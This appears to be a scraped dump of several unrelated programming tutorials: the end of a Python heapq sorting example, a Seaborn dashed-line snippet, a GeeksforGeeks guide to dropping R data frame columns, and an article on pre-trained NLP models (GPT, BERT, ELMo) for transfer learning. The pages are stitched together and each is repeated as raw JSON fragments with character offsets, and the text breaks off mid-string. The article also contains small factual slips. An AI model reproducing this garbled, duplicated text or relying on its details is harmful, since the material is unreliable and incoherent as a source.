strings and their lengths." }, { "code": null, "e": 4821, "s": 4373, "text": "class DataWrap: def __init__(self, data): self.data = data def __lt__(self, other): return len(self.data) > len(other.data)# Create list of stringsmy_strings = [\"write\", \"go\", \"run\", \"come\"]# Initialisingsorted_strings = []# Wrap strings and push to heapfor s in my_strings: heapObj = DataWrap(s) heapq.heappush(sorted_strings, heapObj)# Print the heapfor myObj in sorted_strings: print(myObj.data, end=\"\\t\")" }, { "code": null, "e": 4976, "s": 4821, "text": "Note how the length comparison has changed in the __lt__ function of the DataWrap class. The output from printing items from this heap will be as follows." }, { "code": null, "e": 4994, "s": 4976, "text": "write\tcome\trun\tgo" }, { "code": null, "e": 5060, "s": 4994, "text": "Note that now the longest word write is in the front of the heap." }, { "code": null, "e": 5215, "s": 5060, "text": "I hope you found this article informative and useful during implementations with the heapq module. Please feel free to play around with the code provided." }, { "code": null, "e": 5238, "s": 5215, "text": "Thank you for reading!" }, { "code": null, "e": 5246, "s": 5238, "text": "Cheers!" } ]
How to plot a dashed line on a Seaborn lineplot in Matplotlib?
To plot a dashed line on a Seaborn lineplot, we can use linestyle="dashed" in the argument of lineplot(). Set the figure size and adjust the padding between and around the subplots. Set the figure size and adjust the padding between and around the subplots. Create x and y data points using numpy. Create x and y data points using numpy. Use lineplot() method with x and y data points in the argument and linestyle="dashed". Use lineplot() method with x and y data points in the argument and linestyle="dashed". To display the figure, use show() method. To display the figure, use show() method. import seaborn as sns import numpy as np from matplotlib import pyplot as plt plt.rcParams["figure.figsize"] = [7.50, 3.50] plt.rcParams["figure.autolayout"] = True x = np.random.rand(10) y = np.random.rand(10) ax = sns.lineplot(x=x, y=y, linestyle="dashed") plt.show()
[ { "code": null, "e": 1168, "s": 1062, "text": "To plot a dashed line on a Seaborn lineplot, we can use linestyle=\"dashed\" in the argument of lineplot()." }, { "code": null, "e": 1244, "s": 1168, "text": "Set the figure size and adjust the padding between and around the subplots." }, { "code": null, "e": 1320, "s": 1244, "text": "Set the figure size and adjust the padding between and around the subplots." }, { "code": null, "e": 1360, "s": 1320, "text": "Create x and y data points using numpy." }, { "code": null, "e": 1400, "s": 1360, "text": "Create x and y data points using numpy." }, { "code": null, "e": 1487, "s": 1400, "text": "Use lineplot() method with x and y data points in the argument and linestyle=\"dashed\"." }, { "code": null, "e": 1574, "s": 1487, "text": "Use lineplot() method with x and y data points in the argument and linestyle=\"dashed\"." }, { "code": null, "e": 1616, "s": 1574, "text": "To display the figure, use show() method." }, { "code": null, "e": 1658, "s": 1616, "text": "To display the figure, use show() method." }, { "code": null, "e": 1928, "s": 1658, "text": "import seaborn as sns\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.rcParams[\"figure.figsize\"] = [7.50, 3.50]\nplt.rcParams[\"figure.autolayout\"] = True\nx = np.random.rand(10)\ny = np.random.rand(10)\nax = sns.lineplot(x=x, y=y, linestyle=\"dashed\")\nplt.show()" } ]
Drop column(s) by name from a given DataFrame in R - GeeksforGeeks
26 Mar, 2021 Dropping of columns from a data frame is simply used to remove the unwanted columns in the data frame. In this article, we will be discussing the two different approaches to drop columns by name from a given Data Frame in R. The different approaches to drop columns by the name from a data frame is R language are discussed below This is one of the easiest approaches to drop columns is by using the subset() function with the ‘-‘ sign which indicates dropping variables. This function in R Language is used to create subsets of a Data frame and can also be used to drop columns from a data frame. Syntax: subset(df, expr) Parameters: df: Data frame used expr: Condition for a subset Approach Create data frame Select subset of the data to be removed Put a minus sign Assign to initial data frame Display data frame Example: R gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg gfg = subset(gfg, select = -c(x,z) )print('Modified dataframe:-')gfg Output: In this method, we are creating a character vector named drop in which we are storing column names Later we are telling R to select all the variables except the column names specified in the vector drop. The ‘!’ sign indicates negation. The function names() in R Language are used to get or set the name of an Object. This function takes the object i.e. vector, matrix, or data frame as an argument along with the value that is to be assigned a name to the object. The length of the value vector passed must be exactly equal to the length of the object to be named and returns all the column names. Syntax: names(x) <- value Parameters: x: Object i.e. vector, matrix, data frame, etc. value: Names to be assigned to x Approach Create data frame Select columns to be deleted Apply negation Assign it to the initial data frame Display data frame Example: R gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg drop <- c("x","z") gfg = gfg[,!(names(gfg) %in% drop)]print('Modified dataframe:-')gfg Output: In this approach, we will be using select() by the import the dplyr library in R language and specifying the parameter to drop the columns of the dataset. Basically, this function keeps only the variables you mention. Syntax:- select(.data, ...) Parameters:- data:-A data frame, data frame extension, or a lazy data frame. ... :- One or more unquoted expressions separated by commas. Variable names can be used as if they were positions in the data frame, so expressions like x:y can be used to select a range of variables. Approach Import module Create data frame Select column to be removed Apply minus sign Assign it to the initial data frame Display data frame Example:- R library(dplyr) gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg print('Modified dataframe:-')select(gfg, -a) Output:- Picked R DataFrame-Programs R-DataFrame R Language R Programs Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Change Color of Bars in Barchart using ggplot2 in R How to Change Axis Scales in R Plots? Group by function in R using Dplyr How to Split Column Into Multiple Columns in R DataFrame? How to filter R DataFrame by values in a column? How to Split Column Into Multiple Columns in R DataFrame? How to filter R DataFrame by values in a column? How to filter R dataframe by multiple conditions? Replace Specific Characters in String in R Convert Matrix to Dataframe in R
[ { "code": null, "e": 25242, "s": 25214, "text": "\n26 Mar, 2021" }, { "code": null, "e": 25467, "s": 25242, "text": "Dropping of columns from a data frame is simply used to remove the unwanted columns in the data frame. In this article, we will be discussing the two different approaches to drop columns by name from a given Data Frame in R." }, { "code": null, "e": 25572, "s": 25467, "text": "The different approaches to drop columns by the name from a data frame is R language are discussed below" }, { "code": null, "e": 25840, "s": 25572, "text": "This is one of the easiest approaches to drop columns is by using the subset() function with the ‘-‘ sign which indicates dropping variables. This function in R Language is used to create subsets of a Data frame and can also be used to drop columns from a data frame." }, { "code": null, "e": 25851, "s": 25840, "text": " Syntax: " }, { "code": null, "e": 25868, "s": 25851, "text": "subset(df, expr)" }, { "code": null, "e": 25882, "s": 25868, "text": " Parameters:" }, { "code": null, "e": 25902, "s": 25882, "text": "df: Data frame used" }, { "code": null, "e": 25931, "s": 25902, "text": "expr: Condition for a subset" }, { "code": null, "e": 25940, "s": 25931, "text": "Approach" }, { "code": null, "e": 25958, "s": 25940, "text": "Create data frame" }, { "code": null, "e": 25998, "s": 25958, "text": "Select subset of the data to be removed" }, { "code": null, "e": 26015, "s": 25998, "text": "Put a minus sign" }, { "code": null, "e": 26044, "s": 26015, "text": "Assign to initial data frame" }, { "code": null, "e": 26063, "s": 26044, "text": "Display data frame" }, { "code": null, "e": 26072, "s": 26063, "text": "Example:" }, { "code": null, "e": 26074, "s": 26072, "text": "R" }, { "code": "gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg gfg = subset(gfg, select = -c(x,z) )print('Modified dataframe:-')gfg", "e": 26351, "s": 26074, "text": null }, { "code": null, "e": 26359, "s": 26351, "text": "Output:" }, { "code": null, "e": 26598, "s": 26359, "text": "In this method, we are creating a character vector named drop in which we are storing column names Later we are telling R to select all the variables except the column names specified in the vector drop. The ‘!’ sign indicates negation. " }, { "code": null, "e": 26960, "s": 26598, "text": "The function names() in R Language are used to get or set the name of an Object. This function takes the object i.e. vector, matrix, or data frame as an argument along with the value that is to be assigned a name to the object. The length of the value vector passed must be exactly equal to the length of the object to be named and returns all the column names." }, { "code": null, "e": 26974, "s": 26960, "text": " Syntax: " }, { "code": null, "e": 26992, "s": 26974, "text": "names(x) <- value" }, { "code": null, "e": 27006, "s": 26992, "text": " Parameters:" }, { "code": null, "e": 27054, "s": 27006, "text": "x: Object i.e. vector, matrix, data frame, etc." }, { "code": null, "e": 27087, "s": 27054, "text": "value: Names to be assigned to x" }, { "code": null, "e": 27096, "s": 27087, "text": "Approach" }, { "code": null, "e": 27114, "s": 27096, "text": "Create data frame" }, { "code": null, "e": 27143, "s": 27114, "text": "Select columns to be deleted" }, { "code": null, "e": 27158, "s": 27143, "text": "Apply negation" }, { "code": null, "e": 27194, "s": 27158, "text": "Assign it to the initial data frame" }, { "code": null, "e": 27213, "s": 27194, "text": "Display data frame" }, { "code": null, "e": 27222, "s": 27213, "text": "Example:" }, { "code": null, "e": 27224, "s": 27222, "text": "R" }, { "code": "gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg drop <- c(\"x\",\"z\") gfg = gfg[,!(names(gfg) %in% drop)]print('Modified dataframe:-')gfg", "e": 27518, "s": 27224, "text": null }, { "code": null, "e": 27526, "s": 27518, "text": "Output:" }, { "code": null, "e": 27744, "s": 27526, "text": "In this approach, we will be using select() by the import the dplyr library in R language and specifying the parameter to drop the columns of the dataset. Basically, this function keeps only the variables you mention." }, { "code": null, "e": 27753, "s": 27744, "text": "Syntax:-" }, { "code": null, "e": 27772, "s": 27753, "text": "select(.data, ...)" }, { "code": null, "e": 27785, "s": 27772, "text": "Parameters:-" }, { "code": null, "e": 27849, "s": 27785, "text": "data:-A data frame, data frame extension, or a lazy data frame." }, { "code": null, "e": 28050, "s": 27849, "text": "... :- One or more unquoted expressions separated by commas. Variable names can be used as if they were positions in the data frame, so expressions like x:y can be used to select a range of variables." }, { "code": null, "e": 28059, "s": 28050, "text": "Approach" }, { "code": null, "e": 28073, "s": 28059, "text": "Import module" }, { "code": null, "e": 28091, "s": 28073, "text": "Create data frame" }, { "code": null, "e": 28119, "s": 28091, "text": "Select column to be removed" }, { "code": null, "e": 28136, "s": 28119, "text": "Apply minus sign" }, { "code": null, "e": 28172, "s": 28136, "text": "Assign it to the initial data frame" }, { "code": null, "e": 28191, "s": 28172, "text": "Display data frame" }, { "code": null, "e": 28201, "s": 28191, "text": "Example:-" }, { "code": null, "e": 28203, "s": 28201, "text": "R" }, { "code": "library(dplyr) gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg print('Modified dataframe:-')select(gfg, -a)", "e": 28472, "s": 28203, "text": null }, { "code": null, "e": 28481, "s": 28472, "text": "Output:-" }, { "code": null, "e": 28488, "s": 28481, "text": "Picked" }, { "code": null, "e": 28509, "s": 28488, "text": "R DataFrame-Programs" }, { "code": null, "e": 28521, "s": 28509, "text": "R-DataFrame" }, { "code": null, "e": 28532, "s": 28521, "text": "R Language" }, { "code": null, "e": 28543, "s": 28532, "text": "R Programs" }, { "code": null, "e": 28641, "s": 28543, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 28693, "s": 28641, "text": "Change Color of Bars in Barchart using ggplot2 in R" }, { "code": null, "e": 28731, "s": 28693, "text": "How to Change Axis Scales in R Plots?" }, { "code": null, "e": 28766, "s": 28731, "text": "Group by function in R using Dplyr" }, { "code": null, "e": 28824, "s": 28766, "text": "How to Split Column Into Multiple Columns in R DataFrame?" }, { "code": null, "e": 28873, "s": 28824, "text": "How to filter R DataFrame by values in a column?" }, { "code": null, "e": 28931, "s": 28873, "text": "How to Split Column Into Multiple Columns in R DataFrame?" }, { "code": null, "e": 28980, "s": 28931, "text": "How to filter R DataFrame by values in a column?" }, { "code": null, "e": 29030, "s": 28980, "text": "How to filter R dataframe by multiple conditions?" }, { "code": null, "e": 29073, "s": 29030, "text": "Replace Specific Characters in String in R" } ]
3 Pre-Trained Model Series to Use for NLP with Transfer Learning | by Orhan G. Yalçın | Towards Data Science
Before we start, if you are reading this article, I am sure that we share similar interests and are/will be in similar industries. So let’s connect via Linkedin! Please do not hesitate to send a contact request! Orhan G. Yalçın — Linkedin If you have been trying to build machine learning models with high accuracy; but never tried Transfer Learning, this article will change your life. At least, it did mine! Note that this post is also a follow-up post of a post on Transfer Learning for Computer vision tasks. It has started to gain popularity, and now I wanted to share the NLP version of that with you. But, just in case, check it out: towardsdatascience.com Most of us have already tried several machine learning tutorials to grasp the basics of neural networks. These tutorials helped us understand the basics of artificial neural networks such as Recurrent Neural Networks, Convolutional Neural Networks, GANs, and Autoencoders. But, their main functionality was to prepare you for real-world implementations. Now, if you are planning to build an AI system that utilizes deep learning, you have to either have deep pockets for training and excellent AI researchers at your disposal*; or benefit from transfer learning. * According to BD Tech Talks, the training cost of OpenAI's GPT3 exceeded US $4.6 million dollars. Transfer learning is a subfield of machine learning and artificial intelligence, which aims to apply the knowledge gained from one task (source task) to a different but similar task (target task). In other words: Transfer learning is the improvement of learning in a new task through the transfer of knowledge from a related task that has already been learned. For example, the knowledge gained while learning to classify Wikipedia texts can help tackle legal text classification problems. Another example would be using the knowledge gained while learning to classify cars to recognize the birds in the sky. As you can see, there is a relation between these examples. We are not using a text classification model on bird detection. In summary, transfer learning saves us from reinventing the wheel, meaning we don’t waste time doing the things that have already been done by a major company. Thanks to transfer learning, we can build AI applications in a very short amount of time. The history of Transfer Learning dates back to 1993. With her paper, Discriminability-Based Transfer between Neural Networks, Lorien Pratt opened the pandora’s box and introduced the world to the potential of transfer learning. In July 1997, the journal Machine Learning published a special issue for transfer learning papers. As the field advanced, adjacent topics such as multi-task learning were also included under the field of transfer learning. Learning to Learn is one of the pioneer books in this field. Today, transfer learning is a powerful source for tech entrepreneurs to build new AI solutions and researchers to push machine learning frontiers. To show the power of transfer learning, we can quote from Andrew Ng: Transfer learning will be the next driver of machine learning’s commercial success after supervised learning. There are three requirements to achieve transfer learning: Development of an Open Source Pre-trained Model by a Third Party Repurposing the Model Fine Tuning for the Problem A pre-trained model is a model created and trained by someone else to solve a similar problem. In practice, someone is almost always a tech giant or a group of star researchers. They usually choose a very large dataset as their base datasets, such as ImageNet or the Wikipedia Corpus. Then, they create a large neural network (e.g., VGG19 has 143,667,240 parameters) to solve a particular problem (e.g., this problem is image classification for VGG19). Of course, this pre-trained model must be made public so that we can take it and repurpose it. After getting our hands on these pre-trained models, we repurpose the learned knowledge, which includes the layers, features, weights, and biases. There are several ways to load a pre-trained model into our environment. In the end, it is just a file/folder which contains the relevant information. Deep learning libraries already host many of these pre-trained models, which makes them more accessible and convenient: TensorFlow Hub PyTorch Hub Hugging Face You can use one of the sources above to load a trained model. It will usually come with all the layers and weights, and you can edit the network as you wish. Additionally, some research labs maintain their own repos, as you will see for ELMo later in this post. Well, while the current model may work for our problem. It is often better to fine-tune the pre-trained model for two reasons: So that we can achieve even higher accuracy; Our fine-tuned model can generate the output in the correct format. Generally speaking, in a neural network, while the bottom and mid-level layers usually represent general features, the top layers represent the problem-specific features. Since our new problem is different than the original problem, we tend to drop the top layers. By adding layers specific to our problems, we can achieve higher accuracy. After dropping the top layers, we need to place our own layers so that we can get the output we want. For example, a model trained with English Wikipedia such as BERT can be customized by adding additional layers and further trained with the IMDB Reviews dataset to predict movie reviews sentiments. After adding our custom layers to the pre-trained model, we can configure it with special loss functions and optimizers and fine-tune it with extra training. For a quick Transfer Learning tutorial, you may visit the post below: towardsdatascience.com Here are the three pre-trained network series you can use for natural language processing tasks ranging from text classification, sentiment analysis, text generation, word embedding, machine translation, and so on: Open AI GPT Series BERT Variations ELMo Variations While BERT and OpenAI GPT are based on transformers network, ELMo takes advantage of bidirectional LSTM network. Ok, let’s dive into them one-by-one. There are three generations of GPT models created by OpenAI. GPT, which stands for Generative Pre-trained Transformers, is an autoregressive language model that uses deep learning to produce human-like text. Currently, the most advanced GPT available is GPT-3; and the most complex version of GPT-3 has over 175 billion parameters. Before the release of GPT-3 in May 2020, the most complex pre-trained NLP model was Microsoft’s Turing NLG. GPT-3 can create very realistic text, which is sometimes difficult to distinguish from the human-generated text. That’s why the engineers warned of the GPT-3’s potential dangers and called for risk mitigation research. Here is a video about 14 cool apps built on GPT-3: As opposed to most other pre-trained NLP models, OpenAI chose not to share the GPT-3's source code. Instead, they allowed invitation-based API access, and you can apply for a license by visiting their website. Check it out: openai.com On September 22, 2020, Microsoft announced it had licensed “exclusive” use of GPT-3. Therefore, while others have to rely on the API to receive output, Microsoft has control of the source code. Here is brief info about its size and performance: Year Published: 2020 (GPT-3) Size: Unknown Q&A: F1-Scores of 81.5 in zero-shot, 84.0 in one-shot, 85.0 in few-shot learning TriviaAQ: Accuracy of 64.3% LAMBADA: Accuracy of 76.2% Number of Parameters: 175,000,000,000 BERT stands for Bidirectional Encoder Representations from Transformers, and it is a state-of-the-art machine learning model used for NLP tasks. Jacob Devlin and his colleagues developed BERT at Google in 2018. Devlin and his colleagues trained the BERT on English Wikipedia (2.5B words) and BooksCorpus (0.8B words) and achieved the best accuracies for some of the NLP tasks in 2018. There are two pre-trained general BERT variations: The base model is a 12-layer, 768-hidden, 12-heads, 110M parameter neural network architecture, whereas the large model is a 24-layer, 1024-hidden, 16-heads, 340M parameter neural network architecture. Figure 2 shows the visualization of the BERT network created by Devlin et al. Even though BERT seems more inferior to GPT-3, the availability of source code to the public makes the model much more popular among developers. You can easily load a BERT variation for your NLP task using the Hugging Face’s Transformers library. Besides, there are several BERT variations, such as original BERT, RoBERTa (by Facebook), DistilBERT, and XLNet. Here is a helpful TDS post on their comparison: towardsdatascience.com Here is brief info about BERT’s size and performance: Year Published: 2018 Size: 440 MB (BERT Baseline) GLUE Benchmark: Average accuracy of 82.1% SQuAD v2.0: Accuracy of 86.3% Number of Parameters: 110,000,000–340,000,000 ELMo, short for Embeddings from Language Models, is a word embedding system for representing words and phrases as vectors. ELMo models the syntax and semantic of words as well as their linguistic context, and it was developed by the Allen Institute for Brain Science. There several variations of ELMo, and the most complex ELMo model (ELMo 5.5B) was trained on a dataset of 5.5B tokens consisting of Wikipedia (1.9B) and all of the monolingual news crawl data from WMT 2008–2012 (3.6B). While both BERT and GPT models are based on transformation networks, ELMo models are based on bi-directional LSTM networks. Here is brief info about ELMo’s size and performance: Year Published: 2018 Size: 357 MB (ELMo 5.5B) SQuAD: Accuracy of 85.8% NER: Accuracy of 92.2% Number of Parameters: 93,600,000 Just like BERT models, we also have access to ELMo source code. You can download the different variations of ELMos from Allen NLP’s Website: allennlp.org Although there are several other pre-trained NLP models available in the market (e.g., GloVe), GPT, BERT, and ELMo are currently the best pre-trained models out there. Since this post aims to introduce these models, we will not have a code-along tutorial. But, I will share several tutorials where we exploit these very advanced pre-trained NLP models. In a world where we have easy access to state-of-the-art neural network models, trying to build your own model with limited resources is like trying to reinvent the wheel. It is pointless. Instead, try to work with these train models, add a couple of new layers on top considering your particular natural language processing task, and train. The results will be much more successful than a model you build from scratch. If you would like to have access to full code on Google Colab, and have access to my latest content, subscribe to the mailing list:✉️ Subsribe Now If you are interested in deep learning, also check out the guide to my content on artificial intelligence:
[ { "code": null, "e": 411, "s": 171, "text": "Before we start, if you are reading this article, I am sure that we share similar interests and are/will be in similar industries. So let’s connect via Linkedin! Please do not hesitate to send a contact request! Orhan G. Yalçın — Linkedin" }, { "code": null, "e": 582, "s": 411, "text": "If you have been trying to build machine learning models with high accuracy; but never tried Transfer Learning, this article will change your life. At least, it did mine!" }, { "code": null, "e": 813, "s": 582, "text": "Note that this post is also a follow-up post of a post on Transfer Learning for Computer vision tasks. It has started to gain popularity, and now I wanted to share the NLP version of that with you. But, just in case, check it out:" }, { "code": null, "e": 836, "s": 813, "text": "towardsdatascience.com" }, { "code": null, "e": 1190, "s": 836, "text": "Most of us have already tried several machine learning tutorials to grasp the basics of neural networks. These tutorials helped us understand the basics of artificial neural networks such as Recurrent Neural Networks, Convolutional Neural Networks, GANs, and Autoencoders. But, their main functionality was to prepare you for real-world implementations." }, { "code": null, "e": 1285, "s": 1190, "text": "Now, if you are planning to build an AI system that utilizes deep learning, you have to either" }, { "code": null, "e": 1367, "s": 1285, "text": "have deep pockets for training and excellent AI researchers at your disposal*; or" }, { "code": null, "e": 1399, "s": 1367, "text": "benefit from transfer learning." }, { "code": null, "e": 1498, "s": 1399, "text": "* According to BD Tech Talks, the training cost of OpenAI's GPT3 exceeded US $4.6 million dollars." }, { "code": null, "e": 1711, "s": 1498, "text": "Transfer learning is a subfield of machine learning and artificial intelligence, which aims to apply the knowledge gained from one task (source task) to a different but similar task (target task). In other words:" }, { "code": null, "e": 1859, "s": 1711, "text": "Transfer learning is the improvement of learning in a new task through the transfer of knowledge from a related task that has already been learned." }, { "code": null, "e": 2231, "s": 1859, "text": "For example, the knowledge gained while learning to classify Wikipedia texts can help tackle legal text classification problems. Another example would be using the knowledge gained while learning to classify cars to recognize the birds in the sky. As you can see, there is a relation between these examples. We are not using a text classification model on bird detection." }, { "code": null, "e": 2481, "s": 2231, "text": "In summary, transfer learning saves us from reinventing the wheel, meaning we don’t waste time doing the things that have already been done by a major company. Thanks to transfer learning, we can build AI applications in a very short amount of time." }, { "code": null, "e": 3140, "s": 2481, "text": "The history of Transfer Learning dates back to 1993. With her paper, Discriminability-Based Transfer between Neural Networks, Lorien Pratt opened the pandora’s box and introduced the world to the potential of transfer learning. In July 1997, the journal Machine Learning published a special issue for transfer learning papers. As the field advanced, adjacent topics such as multi-task learning were also included under the field of transfer learning. Learning to Learn is one of the pioneer books in this field. Today, transfer learning is a powerful source for tech entrepreneurs to build new AI solutions and researchers to push machine learning frontiers." }, { "code": null, "e": 3209, "s": 3140, "text": "To show the power of transfer learning, we can quote from Andrew Ng:" }, { "code": null, "e": 3319, "s": 3209, "text": "Transfer learning will be the next driver of machine learning’s commercial success after supervised learning." }, { "code": null, "e": 3378, "s": 3319, "text": "There are three requirements to achieve transfer learning:" }, { "code": null, "e": 3443, "s": 3378, "text": "Development of an Open Source Pre-trained Model by a Third Party" }, { "code": null, "e": 3465, "s": 3443, "text": "Repurposing the Model" }, { "code": null, "e": 3493, "s": 3465, "text": "Fine Tuning for the Problem" }, { "code": null, "e": 4041, "s": 3493, "text": "A pre-trained model is a model created and trained by someone else to solve a similar problem. In practice, someone is almost always a tech giant or a group of star researchers. They usually choose a very large dataset as their base datasets, such as ImageNet or the Wikipedia Corpus. Then, they create a large neural network (e.g., VGG19 has 143,667,240 parameters) to solve a particular problem (e.g., this problem is image classification for VGG19). Of course, this pre-trained model must be made public so that we can take it and repurpose it." }, { "code": null, "e": 4459, "s": 4041, "text": "After getting our hands on these pre-trained models, we repurpose the learned knowledge, which includes the layers, features, weights, and biases. There are several ways to load a pre-trained model into our environment. In the end, it is just a file/folder which contains the relevant information. Deep learning libraries already host many of these pre-trained models, which makes them more accessible and convenient:" }, { "code": null, "e": 4474, "s": 4459, "text": "TensorFlow Hub" }, { "code": null, "e": 4486, "s": 4474, "text": "PyTorch Hub" }, { "code": null, "e": 4499, "s": 4486, "text": "Hugging Face" }, { "code": null, "e": 4761, "s": 4499, "text": "You can use one of the sources above to load a trained model. It will usually come with all the layers and weights, and you can edit the network as you wish. Additionally, some research labs maintain their own repos, as you will see for ELMo later in this post." }, { "code": null, "e": 4888, "s": 4761, "text": "Well, while the current model may work for our problem. It is often better to fine-tune the pre-trained model for two reasons:" }, { "code": null, "e": 4933, "s": 4888, "text": "So that we can achieve even higher accuracy;" }, { "code": null, "e": 5001, "s": 4933, "text": "Our fine-tuned model can generate the output in the correct format." }, { "code": null, "e": 5341, "s": 5001, "text": "Generally speaking, in a neural network, while the bottom and mid-level layers usually represent general features, the top layers represent the problem-specific features. Since our new problem is different than the original problem, we tend to drop the top layers. By adding layers specific to our problems, we can achieve higher accuracy." }, { "code": null, "e": 5641, "s": 5341, "text": "After dropping the top layers, we need to place our own layers so that we can get the output we want. For example, a model trained with English Wikipedia such as BERT can be customized by adding additional layers and further trained with the IMDB Reviews dataset to predict movie reviews sentiments." }, { "code": null, "e": 5799, "s": 5641, "text": "After adding our custom layers to the pre-trained model, we can configure it with special loss functions and optimizers and fine-tune it with extra training." }, { "code": null, "e": 5869, "s": 5799, "text": "For a quick Transfer Learning tutorial, you may visit the post below:" }, { "code": null, "e": 5892, "s": 5869, "text": "towardsdatascience.com" }, { "code": null, "e": 6107, "s": 5892, "text": "Here are the three pre-trained network series you can use for natural language processing tasks ranging from text classification, sentiment analysis, text generation, word embedding, machine translation, and so on:" }, { "code": null, "e": 6126, "s": 6107, "text": "Open AI GPT Series" }, { "code": null, "e": 6142, "s": 6126, "text": "BERT Variations" }, { "code": null, "e": 6158, "s": 6142, "text": "ELMo Variations" }, { "code": null, "e": 6271, "s": 6158, "text": "While BERT and OpenAI GPT are based on transformers network, ELMo takes advantage of bidirectional LSTM network." }, { "code": null, "e": 6308, "s": 6271, "text": "Ok, let’s dive into them one-by-one." }, { "code": null, "e": 6748, "s": 6308, "text": "There are three generations of GPT models created by OpenAI. GPT, which stands for Generative Pre-trained Transformers, is an autoregressive language model that uses deep learning to produce human-like text. Currently, the most advanced GPT available is GPT-3; and the most complex version of GPT-3 has over 175 billion parameters. Before the release of GPT-3 in May 2020, the most complex pre-trained NLP model was Microsoft’s Turing NLG." }, { "code": null, "e": 7018, "s": 6748, "text": "GPT-3 can create very realistic text, which is sometimes difficult to distinguish from the human-generated text. That’s why the engineers warned of the GPT-3’s potential dangers and called for risk mitigation research. Here is a video about 14 cool apps built on GPT-3:" }, { "code": null, "e": 7242, "s": 7018, "text": "As opposed to most other pre-trained NLP models, OpenAI chose not to share the GPT-3's source code. Instead, they allowed invitation-based API access, and you can apply for a license by visiting their website. Check it out:" }, { "code": null, "e": 7253, "s": 7242, "text": "openai.com" }, { "code": null, "e": 7498, "s": 7253, "text": "On September 22, 2020, Microsoft announced it had licensed “exclusive” use of GPT-3. Therefore, while others have to rely on the API to receive output, Microsoft has control of the source code. Here is brief info about its size and performance:" }, { "code": null, "e": 7527, "s": 7498, "text": "Year Published: 2020 (GPT-3)" }, { "code": null, "e": 7541, "s": 7527, "text": "Size: Unknown" }, { "code": null, "e": 7622, "s": 7541, "text": "Q&A: F1-Scores of 81.5 in zero-shot, 84.0 in one-shot, 85.0 in few-shot learning" }, { "code": null, "e": 7650, "s": 7622, "text": "TriviaAQ: Accuracy of 64.3%" }, { "code": null, "e": 7677, "s": 7650, "text": "LAMBADA: Accuracy of 76.2%" }, { "code": null, "e": 7715, "s": 7677, "text": "Number of Parameters: 175,000,000,000" }, { "code": null, "e": 8431, "s": 7715, "text": "BERT stands for Bidirectional Encoder Representations from Transformers, and it is a state-of-the-art machine learning model used for NLP tasks. Jacob Devlin and his colleagues developed BERT at Google in 2018. Devlin and his colleagues trained the BERT on English Wikipedia (2.5B words) and BooksCorpus (0.8B words) and achieved the best accuracies for some of the NLP tasks in 2018. There are two pre-trained general BERT variations: The base model is a 12-layer, 768-hidden, 12-heads, 110M parameter neural network architecture, whereas the large model is a 24-layer, 1024-hidden, 16-heads, 340M parameter neural network architecture. Figure 2 shows the visualization of the BERT network created by Devlin et al." }, { "code": null, "e": 8839, "s": 8431, "text": "Even though BERT seems more inferior to GPT-3, the availability of source code to the public makes the model much more popular among developers. You can easily load a BERT variation for your NLP task using the Hugging Face’s Transformers library. Besides, there are several BERT variations, such as original BERT, RoBERTa (by Facebook), DistilBERT, and XLNet. Here is a helpful TDS post on their comparison:" }, { "code": null, "e": 8862, "s": 8839, "text": "towardsdatascience.com" }, { "code": null, "e": 8916, "s": 8862, "text": "Here is brief info about BERT’s size and performance:" }, { "code": null, "e": 8937, "s": 8916, "text": "Year Published: 2018" }, { "code": null, "e": 8966, "s": 8937, "text": "Size: 440 MB (BERT Baseline)" }, { "code": null, "e": 9008, "s": 8966, "text": "GLUE Benchmark: Average accuracy of 82.1%" }, { "code": null, "e": 9038, "s": 9008, "text": "SQuAD v2.0: Accuracy of 86.3%" }, { "code": null, "e": 9084, "s": 9038, "text": "Number of Parameters: 110,000,000–340,000,000" }, { "code": null, "e": 9695, "s": 9084, "text": "ELMo, short for Embeddings from Language Models, is a word embedding system for representing words and phrases as vectors. ELMo models the syntax and semantic of words as well as their linguistic context, and it was developed by the Allen Institute for Brain Science. There several variations of ELMo, and the most complex ELMo model (ELMo 5.5B) was trained on a dataset of 5.5B tokens consisting of Wikipedia (1.9B) and all of the monolingual news crawl data from WMT 2008–2012 (3.6B). While both BERT and GPT models are based on transformation networks, ELMo models are based on bi-directional LSTM networks." }, { "code": null, "e": 9749, "s": 9695, "text": "Here is brief info about ELMo’s size and performance:" }, { "code": null, "e": 9770, "s": 9749, "text": "Year Published: 2018" }, { "code": null, "e": 9795, "s": 9770, "text": "Size: 357 MB (ELMo 5.5B)" }, { "code": null, "e": 9820, "s": 9795, "text": "SQuAD: Accuracy of 85.8%" }, { "code": null, "e": 9843, "s": 9820, "text": "NER: Accuracy of 92.2%" }, { "code": null, "e": 9876, "s": 9843, "text": "Number of Parameters: 93,600,000" }, { "code": null, "e": 10017, "s": 9876, "text": "Just like BERT models, we also have access to ELMo source code. You can download the different variations of ELMos from Allen NLP’s Website:" }, { "code": null, "e": 10030, "s": 10017, "text": "allennlp.org" }, { "code": null, "e": 10383, "s": 10030, "text": "Although there are several other pre-trained NLP models available in the market (e.g., GloVe), GPT, BERT, and ELMo are currently the best pre-trained models out there. Since this post aims to introduce these models, we will not have a code-along tutorial. But, I will share several tutorials where we exploit these very advanced pre-trained NLP models." }, { "code": null, "e": 10572, "s": 10383, "text": "In a world where we have easy access to state-of-the-art neural network models, trying to build your own model with limited resources is like trying to reinvent the wheel. It is pointless." }, { "code": null, "e": 10803, "s": 10572, "text": "Instead, try to work with these train models, add a 